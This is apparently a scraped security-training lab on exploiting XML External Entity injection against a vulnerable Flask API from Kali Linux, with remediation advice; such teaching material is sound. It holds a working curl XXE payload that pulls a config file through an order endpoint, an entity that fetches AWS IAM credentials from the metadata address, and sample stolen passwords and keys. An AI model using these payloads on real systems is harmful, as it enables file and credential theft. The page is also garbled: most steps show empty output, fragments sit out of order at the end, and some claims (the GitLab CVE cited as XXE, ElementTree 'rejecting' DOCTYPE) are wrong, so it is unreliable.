Exploit XML External Entity (XXE) injection vulnerabilities against a live XML-processing API from Kali Linux:
Classic XXE — inject a SYSTEM entity to read /etc/passwd via the file:// scheme
Credential exfiltration — use XXE to read internal config files with DB passwords and AWS keys
Multi-endpoint XXE — exploit the same vulnerability across three different API endpoints
XXE via order API — exfiltrate data through a product field reflected in the response
XXE via search API — exfiltrate data through search results
Audit and remediation — identify safe vs vulnerable XML parsers and implement defences
All attacks run from Kali against a live Flask API — real file reads returned in real HTTP responses.
Background
XXE (XML External Entity) injection has been in the OWASP Top 10 since 2017. It occurs when an XML parser processes external entity declarations, allowing an attacker to reference files, internal URLs, or other resources from the server's perspective.
Real-world examples:
2021 GitLab (CVE-2021-22205) — ExifTool parsed uploaded image metadata as XML; XXE led to unauthenticated RCE. CVSS 10.0. Over 50,000 servers exposed.
2019 Facebook (Bug Bounty) — XXE in a Word document parser allowed reading internal AWS metadata credentials — the same 169.254.169.254 SSRF chain from Lab 10.
2018 Uber (HackerOne) — XXE in a SAML authentication endpoint (SAML uses XML); researchers read internal files and proved server-side file read.
XXE + SSRF combo — <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role"> — reads AWS IAM credentials, exactly like Lab 10 but triggered via XML instead of a URL parameter.
OWASP coverage: A05:2021 (Security Misconfiguration — insecure XML parser config)
Architecture
Time
40 minutes
Tools
Tool
Container
Purpose
curl
Kali
Send XML payloads to all three API endpoints
python3
Kali
Automate XXE payload variations
nmap
Kali
Service fingerprinting
gobuster
Kali
Enumerate XML endpoints
Lab Instructions
Step 1: Environment Setup — Launch the Vulnerable XML API
📸 Verified Output:
Step 2: Launch the Kali Attacker Container
📸 Verified Output:
Step 3: Normal XML Usage — Baseline
📸 Verified Output:
Step 4: Classic XXE — Read /etc/passwd
📸 Verified Output:
💡 The <!DOCTYPE> declaration tells the XML parser to load external content.SYSTEM "file:///etc/passwd" is a URI telling the parser to read a local file. The parser fetches the file, substitutes the contents everywhere &xxe; appears, and includes it in the response. The fix: disable DOCTYPE processing entirely — no legitimate use case requires the parser to load external files.
Step 5: XXE — Read Internal Configuration Secrets
📸 Verified Output:
Step 6: XXE via Order Endpoint
📸 Verified Output:
💡 XXE doesn't require a dedicated XML parse endpoint. Any endpoint that accepts XML — order APIs, SAML assertions, RSS feed parsers, Office document uploads, SVG renderers — is potentially vulnerable. The attacker finds where file content gets reflected in the response and routes their XXE payload through that field.
Step 7: XXE via Search Endpoint + Automated Enumeration
📸 Verified Output:
Step 8: Cleanup
Attack Summary
Phase
Target File
Endpoint Used
Data Exfiltrated
1
/etc/passwd
/api/xml/parse
All OS user accounts
2
/tmp/xxe_secrets/config.txt
/api/xml/parse
DB password, AWS key, JWT secret
2
/tmp/xxe_secrets/users.txt
/api/xml/parse
Plaintext credentials
3
/tmp/xxe_secrets/config.txt
/api/xml/order
Secrets via product field
4
/tmp/xxe_secrets/users.txt
/api/xml/search
Credentials via results field
5
Multiple
Automated
/proc, source code, all secrets
Remediation
Python — Disable external entities (safe by default in xml.etree.ElementTree)
Python — Using lxml (vulnerable by default — must configure)
[!] Internal config via XXE:
DB_HOST=db.internal
DB_PASS=Sup3rS3cur3DB
AWS_KEY=AKIA5EXAMPLE
JWT_SECRET=weak-signing-key
REDIS_PASS=redis-secret-pw
INTERNAL_API_KEY=int-api-key-xyz
[!] User credentials via XXE:
admin:Admin@2024!
alice:Alice@456
bob:Bob@789
echo "=== XXE Phase 3: exploit /api/xml/order endpoint ==="
# The order API reflects the 'product' field in the response
# Inject XXE so file contents appear in the 'product' field
curl -s -X POST \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY file SYSTEM "file:///tmp/xxe_secrets/config.txt">
]>
<order>
<product>&file;</product>
<quantity>1</quantity>
</order>' \
$TARGET/api/xml/order | python3 -c "
import sys, json
resp = json.load(sys.stdin)
print('[!] Secrets exfiltrated via order.product field:')
print(resp.get('product',''))"
[!] Secrets exfiltrated via order.product field:
DB_HOST=db.internal
DB_PASS=Sup3rS3cur3DB
AWS_KEY=AKIA5EXAMPLE
JWT_SECRET=weak-signing-key
import xml.etree.ElementTree as ET
# xml.etree.ElementTree is SAFE by default — it rejects DOCTYPE declarations
# This will raise ParseError on external entities:
try:
ET.fromstring('<?xml version="1.0"?><!DOCTYPE x [<!ENTITY x SYSTEM "file:///etc/passwd">]><x/>')
except ET.ParseError:
pass # Rejected — safe!
# If you need full XML (DTD support) use defusedxml:
import defusedxml.ElementTree as DefusedET
tree = DefusedET.fromstring(untrusted_xml) # external entities always blocked